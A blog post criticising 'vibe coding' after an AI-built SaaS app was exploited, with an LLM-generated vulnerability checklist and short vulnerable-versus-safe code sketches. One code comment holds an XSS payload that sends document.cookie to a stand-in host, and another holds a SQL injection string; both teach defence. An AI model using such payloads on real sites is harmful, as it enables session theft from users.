Vibe coding

Last updated: 9 days ago

Published: 9 days ago


This series of screenshots has been making the rounds on programming-adjacent social media lately:

It plays out like a tragedy in four acts.

  1. leo ridicules the idea that one cannot build a SaaS business end to end with an AI
  2. leo admits that their SaaS business was built entirely with Cursor, an AI-augmented editor, and extols its virtues
  3. leo claims someone is trying to find vulnerabilities in their app - while their screenshot shows that the attacker isn’t trying, but rather spectacularly succeeding
  4. leo crashes out, blaming the exploitation of their app on having shared publicly that it was built with Cursor, claiming “there are just some weird ppl out there”

The reactions to this are fairly one-note. “Vibe coding 🤙”, “pride goeth before the fall”, “you get what you pay for”. In other words, it at least reads like a bunch of professional programmers engaging in a victory lap, and/or some chest beating.

Look, ma, we’re still relevant!

I’d like to offer what is hopefully a more nuanced take. tl;dr: not all vibe coding is bad, even though leo here royally goofed up.

An LLM isn’t just an assistant, it’s also a builder

leo isn’t wrong in that claim. Wait, wait – pitchforks down please, hear me out.

Agent-mode LLM coding tools are an incredible feat of engineering. Not that long ago I saw an agentic Claude 3.7 Sonnet walk the codebase, build itself a test to figure something out, fix some lint issues, and offer a reasonable solution to a bug. It’s still a stochastic parrot with some really clever prompting, but it’s an impressive stochastic parrot. I could see this technology being used to implement entire features.

Almost two years ago, I wrote about my experiences with GitHub Copilot. I noted then that it felt like collaborating with a fairly junior developer. Occasional moments of coherent action interspersed with a lot of “mid” results. Of course, back then Copilot only had an assist mode – agentic modes were still years off.

Now agent-mode LLMs offer more than assistance. They purport to offer solutions. They can, indeed, be used as end-to-end builders. Here’s the thing: so can junior developers. If one foists a full build on a sufficiently resourceful and ambitious junior developer, one will eventually get a system out of them. The result might look somewhat okay and at a surface level work pretty well. It might even have some tests and have the appearance of a solid outcome.

Should you put a junior’s project directly into production?

Reasoning from incomplete data

…is a trick humans learn by experience. What’s the best way to learn to avoid XSS? Why, either exploit a system, or get something you built exploited. Same goes for CSRF, SQLi, and any number of other common attacks. Humans learn really well from negative experiences – like being under attack – and from dopamine rushes, like successfully s’kidding one’s way into an insecure system.

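To make the XSS point concrete, here’s a minimal sketch of the kind of bug that teaches the lesson the hard way – a hedged TypeScript/React example, where the Comment type and component names are purely illustrative:

```tsx
// A hedged sketch, not anyone's real code: the classic React XSS footgun.
import React from "react";

type Comment = { author: string; body: string };

// Vulnerable: user-supplied HTML is rendered verbatim, so a body like
// <img src=x onerror="fetch('https://evil.example/?c=' + document.cookie)">
// runs in every reader's browser.
export function CommentUnsafe({ comment }: { comment: Comment }) {
  return <div dangerouslySetInnerHTML={{ __html: comment.body }} />;
}

// Safer: let React escape the text (or sanitize server-side before storing).
export function CommentSafe({ comment }: { comment: Comment }) {
  return <div>{comment.body}</div>;
}
```

Getting burned by exactly this once teaches more than any checklist.
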
But securing a system requires reasoning about second-order effects of your code. It might require reasoning at a feature or system level, rather than at function/file level. One might say agentic LLMs appear to reason at a system level. The word “appear” is load-bearing.

Adding some recursive prompting chicanery in order to slap a reasoning suffix on a model name is, in my opinion, a little dishonest (looking at you, Anthropic!). Multiple passes through a stochastic parrot do not amount to “reasoning”. They amount to multiple passes through a stochastic parrot. The resulting code is less likely to be completely disconnected from the realities of the codebase – or from the relevant library APIs – and that’s all it achieves.

An LLM cannot “think through” the security implications of what it is producing. There may even be guardrails in place that prevent it from properly red-teaming its output. After all, the job of a red team is to inhabit the mindset of an attacker. Claude, ChatGPT and their “colleagues” were likely taught attacking people is a bad thing. An experienced software engineer was (hopefully) taught it was pretty dang fun.

An LLM could help with finding vulnerabilities, right?

I’ve seen this recursive line of thinking. If one can get an LLM to output code, one can also get it to output what to watch out for, right?

I input this prompt into Claude 3.7:

I’m working on securing a web application. My stack is Ruby on Rails on the backend, Typescript and React on the frontend, I’m using PostgreSQL as a database. Provide a concise list of common security vulnerabilities affecting such applications.

Response

Backend (Rails) Vulnerabilities

  • SQL Injection - especially with raw queries or improper ORM usage
  • Mass Assignment vulnerabilities (strong parameters misconfiguration)
  • CSRF token issues if protection is disabled
  • Authentication flaws (session management, password storage)
  • Missing authorization checks
  • Insecure direct object references
  • Outdated dependencies with known CVEs

Frontend (React/TypeScript) Vulnerabilities

  • Cross-Site Scripting (XSS) - especially with dangerouslySetInnerHTML
  • Insecure state management exposing sensitive data
  • Client-side validation without server-side validation
  • Insecure handling of JWT tokens (storage in localStorage)
  • Dependency vulnerabilities in npm packages
  • Lack of Content Security Policy implementation

Database (PostgreSQL) Vulnerabilities

  • Excessive privileges for application database users
  • Unencrypted connections to database
  • Lack of proper backups and disaster recovery
  • Unpatched PostgreSQL instances
  • Weak password policies for database access

API & Data Transfer Vulnerabilities

  • Missing rate limiting leading to DoS vulnerabilities
  • Insecure API endpoints without proper authentication
  • Sensitive data exposure in API responses
  • Missing HTTPS enforcement
  • Improper CORS configuration

DevOps & Infrastructure

  • Secrets management (hardcoded credentials, environment variables exposure)
  • Insecure deployment practices
  • Missing WAF or other security monitoring
  • Insufficient logging for security events
  • Lack of regular security scanning and testing

That’s not a half-bad checklist, right? Yes - if you already know what these things mean. And how to check for them in real codebases. And how to mitigate them in production systems. A junior engineer (at least a smart one) would go white in the face if one gave them this list and told them to guard against it.

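What does “knowing how to check” look like in practice? Take a single item from that list – JWTs in localStorage – and here’s a hedged, browser-side TypeScript sketch, where the key and function names are mine, purely for illustration:

```ts
// Risky: anything in localStorage is readable by any script running on the page,
// so a single XSS escalates into full session/account takeover.
function storeTokenRisky(token: string): void {
  localStorage.setItem("auth_token", token);
}

// Common mitigation: never let client-side JavaScript see the token at all.
// Have the server set it in an httpOnly cookie, e.g.
//   Set-Cookie: session=<token>; HttpOnly; Secure; SameSite=Lax
// and the browser attaches it to requests automatically.
```

Multiply that by every bullet above – the pattern to look for, why it’s dangerous, what the accepted fix is – and you get a sense of the gap between reading the list and acting on it.
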
The “vibe coder” doesn’t know what these things mean. They could learn in time, but since they’re by definition not very technical, they’re starting from the ground floor. And it’s a very different ground floor even compared to our hypothetical smart and driven junior dev. What’s more likely is they’d paste this list, one by one, into the Cursor agent window, telling it to fix the issues it finds.

I’ve got no idea what the results would be, but I strongly suspect they would not amount to a secure system – especially since the agent still only sees the code, not the circumstances of its deployment. It might sniff out an SQLi, but it likely won’t find that spot where your production deployment does insecure frontend calls to Firebase, just begging to be replay-attacked.

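For contrast, here’s a hedged sketch of the kind of in-code SQLi an agent plausibly can flag – node-postgres style, with the table and function names purely illustrative – precisely because the whole flaw sits in one file, which a deployment-level misconfiguration never does:

```ts
import { Client } from "pg";

// Connection details come from the PG* environment variables;
// remember to `await db.connect()` before querying.
const db = new Client();

// Vulnerable, and visible right in the code: user input interpolated into SQL,
// so an email like  ' OR '1'='1  rewrites the query.
async function findUserUnsafe(email: string) {
  return db.query(`SELECT * FROM users WHERE email = '${email}'`);
}

// Fixed: a parameterized query; the driver handles quoting.
async function findUserSafe(email: string) {
  return db.query("SELECT * FROM users WHERE email = $1", [email]);
}
```
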
there are just some weird ppl out there

Every system that can be exploited, will be exploited. This is not scaremongering - it’s statistics. LLMs don’t know how to prevent exploits, but they certainly make it sound like they know what they’re doing. Using these tools with little to no technical knowledge is not a good idea, because unless you know at least a little bit about software engineering, you will not spot where they very confidently screwed up.

Software engineering is not a solved problem by a long shot. Delivering quality systems is a multi-disciplinary quagmire, challenging even to those who have spent decades learning the craft.

I postulated above that our “vibe coder” leo could learn how to secure apps. They could have also learned how to write software properly in the first place. It would have taken them years of intense, focused effort, but it’s completely doable.

Except arguably leo doesn’t want to learn to deliver quality, secure software - they want to build products. They seem kinda okay at it, too – according to them people are paying for their SaaS product. That’s not an easy milestone to achieve at all!

My problem with leo is twofold.

One – they decided to go it alone, perhaps lulled into a false sense of security and productivity by the LLM’s authoritative responses. That part I can understand – I’ve seen LLMs spout hilariously bad takes and code, while remaining intensely self-assured. I know how to spot “hilariously bad”. leo’s expertise clearly lay elsewhere. It’s fine not to know how to do something. I couldn’t come up with a marketable SaaS, most likely. But to close such knowledge gaps one gets a co-founder, not a Claude subscription.

My other problem with leo is the arrogance. It’s a strong word, but I find none more appropriate to describe the gung-ho attitude in their initial posts, and the doubling down in the later ones. Those later posts almost parse as “I’m being attacked because I use Cursor”. No, leo. You’re being attacked because you put a thing on the internet. There indeed are weird ppl out there – and a technical co-founder would have told you this weeks before releasing your SaaS. An overabundance of confidence might work in business; it rarely works in software engineering.

Vibe coding as a learning tool? To bridge minor gaps in understanding? For quick-and-dirty solutions intended to run locally? Sure, more power to ya. Vibe coding as a shortcut to keep the pesky programmers from eating up your revenue, though?

That, clearly, does not pass the vibe check.

Neither does being oblivious that version control exists.

